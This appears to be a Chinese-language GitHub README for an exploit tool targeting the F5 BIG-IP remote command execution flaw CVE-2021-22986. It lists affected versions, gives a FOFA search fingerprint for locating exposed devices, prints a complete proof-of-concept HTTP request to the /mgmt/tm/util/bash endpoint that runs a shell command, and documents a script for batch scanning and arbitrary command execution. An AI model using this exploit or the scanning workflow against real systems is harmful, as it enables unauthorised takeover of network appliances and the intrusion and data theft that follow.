yaunsky/CVE-202122986-EXP

F5 BIG-IP远程代码执行；cve-2021-22986，批量检测；命令执行利用

F5 BIG-IP 远程命令执行漏洞（CVE-2021-22986）

漏洞影响

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

fofa

icon_hash="-335242539"

POC

POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

脚本使用

python3 CVE202122986.py --help

Usage: CVE202122986.py [OPTIONS]

Options:
  -u, --url TEXT   Target URL，对单一目标检测; Example:python3 CVE202122986.py -u https://ip:port

  -f, --file TEXT  Target File，对批量目标检测; Example:python3 CVE202122986.py -f ip.txt

  -c, --cmd TEXT   Target command，命令执行; Example: python3 CVE202122986.py -cmd id

  --help           Show this message and exit.